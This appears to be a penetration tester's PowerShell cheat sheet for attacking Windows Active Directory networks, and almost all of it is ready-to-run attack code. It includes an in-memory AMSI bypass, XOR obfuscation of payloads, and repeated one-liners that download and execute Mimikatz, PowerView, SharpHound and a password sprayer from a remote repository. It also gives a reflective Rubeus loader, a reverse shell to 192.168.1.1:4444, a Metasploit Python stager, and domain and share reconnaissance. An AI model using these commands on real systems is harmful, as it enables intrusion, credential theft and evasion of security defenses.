Powershell / PowerView
Sometimes your stuck with the tools in front of you and no linux etc
XOR Encode powershell payload
1
$file=([Text.Encoding]::UTF8.GetBytes([IO.File]::ReadAllText(".\Get-GPPPassword.ps1"))| %{$_ -bXor0x11})
2
[io.file]::WriteAllBytes('.\Get-GPPPassword.txt',$file)
Copied!
Bypass AMSI
1
$Win32 = @"
2
3
using System;
4
using System.Runtime.InteropServices;
5
6
public class Win32 {
7
8
[DllImport("kernel32")]
9
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
10
11
[DllImport("kernel32")]
12
public static extern IntPtr LoadLibrary(string name);
13
14
[DllImport("kernel32")]
15
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
16
17
}
18
"@
19
20
Add-Type $Win32
21
22
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
23
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
24
$p = 0
25
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
26
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
27
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Copied!
Import AD Recon
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/adrecon.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import PowerView
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerView.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import DomainPasswordSpray
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/DomainPasswordSpray.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
1
# Run with
2
Invoke-DomainPasswordSpray -domain thehackerlab.local -UsernameAsPassword -UserList users.txt -OutFile valid-creds.txt
3
4
Then
5
6
Invoke-DomainPasswordSpray -domain thehackerlab.local -UserList users.txt -OutFile valid-creds.txt -Password Winter2016
Copied!
Import Get-GPPPassword
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Get-GPPPassword.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
7
8
Copied!
1
# Run with
2
Get-GPPPassword -server thehackerlab.com
Copied!
Import Sherlock
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-Sherlock.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import PowerUp
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import Sharphound
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-SharpHound.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import Mimikatz
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/mimikatz.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
Copied!
Import PowershellTCP
1
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerShellTcp.txt"
2
3
$enc = [system.Text.Encoding]::UTF8
4
$file = ((New-Object Net.Webclient).DownloadString($file))
5
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
6
iex ([System.Text.Encoding]::ASCII.GetString($data))
7
8
Upgrade nc shell to reverse meterpreter for pivoting
Copied!
1
# Then run
2
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 4444
Copied!
Download Rubeus.exe
1
$x = (New-Object System.Net.WebClient).downloadData(‘https://github.com/jdksec/RemoteTools/raw/master/Rubeus.exe’)
2
$y = [System.Reflection.Assembly]::Load($x)
3
[Rubeus.Program]::Main(“triage”.Split())
Copied!
Install python from the windows store as a low priv user
1
# On attacking server
2
use exploit/multi/script/web_delivery
3
set lhost 192.168.1.1
4
set lport 80
5
set srvport 443
6
set payload python/meterpreter/reverse_tcp
7
exploit
8
9
# On victim machine
10
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.1:443/vcHsXENK', context=ssl._create_unverified_context());exec(r.read());"
Copied!
Recon all computers in domain
1
Get-NetComputer –OperatingSystem *2003* | Out-File –Encoding ASCII Windows2003Hosts.txt
2
Get-NetComputer –OperatingSystem *2008* | Out-File –Encoding ASCII Windows2008Hosts.txt
3
Get-NetComputer –OperatingSystem *2012* | Out-File –Encoding ASCII Windows2012Hosts.txt
4
Get-NetComputer –OperatingSystem *2016* | Out-File –Encoding ASCII Windows2016Hosts.txt
5
Get-NetComputer –OperatingSystem *2019* | Out-File –Encoding ASCII Windows2019Hosts.txt
6
Get-NetComputer –OperatingSystem *XP* | Out-File –Encoding ASCII WindowsXPHosts.txt
7
Get-NetComputer –OperatingSystem *7* | Out-File –Encoding ASCII Windows7Hosts.txt
8
Get-NetComputer –OperatingSystem * 8* | Out-File –Encoding ASCII Windows8Hosts.txt
9
Get-NetComputer –OperatingSystem *10* | Out-File –Encoding ASCII Windows10Hosts.txt
Copied!
Get list of all dns hostnames in domain
1
get-netcomputer -domain thehackerlab.local | select dnshostname | out-file -append allcomputers.txt
Copied!
Count number of lines in file
1
get-content .\allcomputers.txt | measure-object -line
Copied!
Find interesting shares
1
Get-NetComputer -domain thehackerlab.com | export-csv -Encoding ASCII allhosts.csv
2
import-csv .\allhosts.csv | select dnshostname | out-file dnshostnames.txt
3
get-content .\dnshostnames.txt | foreach-object {invoke-sharefinder -computername $_ -checkshareaccess} |export-csv -append shares.csv
4
Copied!
Split csv to hostnames
1
import-csv .\shares.csv | select ComputerName > hostnames.txt
Copied!
Sort hostnames so they are unique
1
type .\hostnames.txt | get-unique |out-file uniquehostnames.txt
Copied!
Get live IP addresses
1
Get-Content .\allcomputers.txt | ForEach-Object{
2
$hostname = ([system.net.dns]::gethostaddresses("$_")).IPAddressToString
3
if($? -eq $True) {
4
$_ +": "+ $hostname
5
$hostname >> ipaddresses.txt
6
}
7
else {
8
$_ +": Cannot resolve hostname"
9
}}
Copied!
Remove all external addresses
1
type ipaddresses.txt | findstr "192.168 10. 172.32" > internalips.txt
Copied!
Copy link